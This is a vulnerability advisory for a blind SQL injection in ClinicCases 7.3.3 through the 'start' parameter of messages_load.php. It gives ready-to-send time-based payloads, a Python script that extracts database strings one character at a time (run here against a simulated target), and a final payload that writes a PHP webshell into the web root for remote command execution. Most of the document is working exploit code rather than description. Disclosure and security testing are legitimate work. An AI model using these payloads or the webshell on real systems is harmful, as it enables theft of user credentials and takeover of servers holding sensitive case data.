CVE-2021-38706

Blind SQL Injection in ClinicCases 7.3.3

Details

ClinicCases 7.3.3 suffers from a blind SQL injection vulnerability that allows an authenticated, low-privileged attacker to execute arbitrary SQL statements through an unsanitised request parameter.

The injection is reachable from every user account, including low-privilege "student" users.

The HTTP GET parameter "start" is read into "$start" in messages_load.php and used in the SQL query without sanitisation, so its value can be used to execute attacker-supplied SQL. Both payloads below are stacked queries: the leading "0" keeps the original statement valid, ";" ends it, and the trailing "#" comments out whatever the application appends, so they rely on a database layer that executes multiple statements per call. For example, the following payload forces the database to sleep for 5 seconds, which confirms the injection even though the query result itself is never returned to the client:

0;SELECT SLEEP(5)#

As a GET request (the "#" must be sent as "%23"; a bare "#" is a URL fragment and would not reach the server):

http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?&start=0;SELECT%20SLEEP(5)%23


This can be used with common tools, such as sqlmap, to extract records from the database, including usernames, email addresses and password hashes. Because the injection is blind, data is recovered one bit at a time through the time delay rather than read back from the response.
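The following is an added example, not code from the advisory or from ClinicCases: it builds the "start" payloads described above, shows the baseline-versus-SLEEP check a tester should run before calling the finding confirmed, and then turns the delay into a one-bit oracle to recover a string character by character (the technique sqlmap automates). The HTTP layer is replaced by SimulatedTarget, a constructed stand-in that returns the response time a MySQL backend would show for each payload; the expression-to-value table inside it is made up for the demonstration. Against a real target, the oracle would be a function that sends the URL and returns the measured response time.

```python
"""Added example (not ClinicCases code): time-based blind SQLi on the
`start` parameter, from one SLEEP() probe to character extraction.

SimulatedTarget is a constructed stand-in for the vulnerable endpoint so the
script runs offline; its data table is invented for the demonstration.
"""
import re
from urllib.parse import quote, unquote

# Endpoint named in the advisory; the host is the advisory's lab hostname.
BASE_URL = "http://cliniccases.local/cliniccases/lib/php/data/messages_load.php"


def build_url(payload: str) -> str:
    """Place a payload in `start`, percent-encoding everything (';' and '#'
    included: a bare '#' would be treated as a URL fragment and never sent)."""
    return f"{BASE_URL}?&start={quote(payload, safe='')}"


def sleep_payload(seconds: int) -> str:
    """Stacked-query probe: end the original statement with ';', run SLEEP(),
    and comment out whatever the application appends with '#'."""
    return f"0;SELECT SLEEP({seconds})#"


def conditional_payload(expr_sql: str, pos: int, threshold: int, seconds: int) -> str:
    """Sleep only if character `pos` of the result of `expr_sql` has an ASCII
    code greater than `threshold`; this turns the delay into a 1-bit oracle."""
    return (f"0;SELECT IF(ASCII(SUBSTRING(({expr_sql}),{pos},1))>{threshold},"
            f"SLEEP({seconds}),0)#")


def confirm_time_based(oracle, seconds: int = 5, margin: float = 0.8) -> bool:
    """Compare a benign request against the SLEEP probe instead of trusting a
    single slow response. `oracle(payload)` returns the response time in seconds."""
    baseline = oracle("0")                      # valid offset: query runs unchanged
    delayed = oracle(sleep_payload(seconds))
    return delayed - baseline >= seconds * margin


def extract_string(oracle, expr_sql: str, max_len: int = 64, delay: int = 2) -> str:
    """Recover the (ASCII) result of `expr_sql` with a binary search per
    character: 7 requests per character instead of up to 127."""
    baseline = oracle("0")
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                         # candidate code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            elapsed = oracle(conditional_payload(expr_sql, pos, mid, delay)) - baseline
            if elapsed >= delay * 0.8:
                lo = mid + 1                    # server slept: code > mid
            else:
                hi = mid                        # no delay: code <= mid
        if lo == 0:                             # SUBSTRING past the end -> '' -> ASCII('') = 0
            break
        out += chr(lo)
    return out


class SimulatedTarget:
    """Constructed stand-in for the vulnerable endpoint. It recognises the two
    payload shapes above and returns the response time MySQL would produce
    (network latency plus any SLEEP) without actually sleeping."""

    _SLEEP = re.compile(r"0;SELECT SLEEP\((\d+)\)#")
    _COND = re.compile(r"0;SELECT IF\(ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+),"
                       r"SLEEP\((\d+)\),0\)#")

    def __init__(self, data: dict, latency: float = 0.05):
        self.data = data              # constructed: SQL expression -> value it would return
        self.latency = latency        # constructed baseline network latency

    def response_seconds(self, url: str) -> float:
        payload = unquote(url.split("start=", 1)[1])
        m = self._SLEEP.fullmatch(payload)
        if m:
            return self.latency + int(m.group(1))
        m = self._COND.fullmatch(payload)
        if m:
            expr, pos, thr, secs = m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
            value = self.data.get(expr, "")
            code = ord(value[pos - 1]) if pos <= len(value) else 0
            return self.latency + (secs if code > thr else 0)
        return self.latency           # no injection effect: ordinary response


if __name__ == "__main__":
    target = SimulatedTarget({"SELECT user()": "cc_app@localhost"})
    oracle = lambda payload: target.response_seconds(build_url(payload))
    print(build_url(sleep_payload(5)))
    print("time-based injectable:", confirm_time_based(oracle))
    print("database user:", extract_string(oracle, "SELECT user()"))
```

The baseline comparison in confirm_time_based matters in practice: a single 5-second response can come from load or a slow link, while a repeatable delta of roughly the requested SLEEP value against a benign request is hard to explain any other way. The extraction loop assumes ASCII results; MySQL's ASCII() reports the first byte only, so multibyte data needs ORD() and a wider search range.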


This could be escalated to remote command execution by writing arbitrary PHP into the web root with SELECT ... INTO OUTFILE. For example, the following payload writes a minimal webshell as shell.php under the application's web root (assuming the attacker has already determined the webroot path). This step has preconditions beyond the injection itself: the database account needs the FILE privilege, secure_file_priv must be empty or permit the target directory, the MySQL server must run on the same host as the web server under an OS user that can write to that directory, and the target file must not already exist, since INTO OUTFILE does not overwrite:

0;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cliniccases/shell.php'#

As a GET request:

http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?&start=0%3bSELECT+%22%3C%3fphp+system($_GET[%27cmd%27])%3b+%3f%3E%22+INTO+OUTFILE+%27/var/www/html/cliniccases/shell.php%27%23
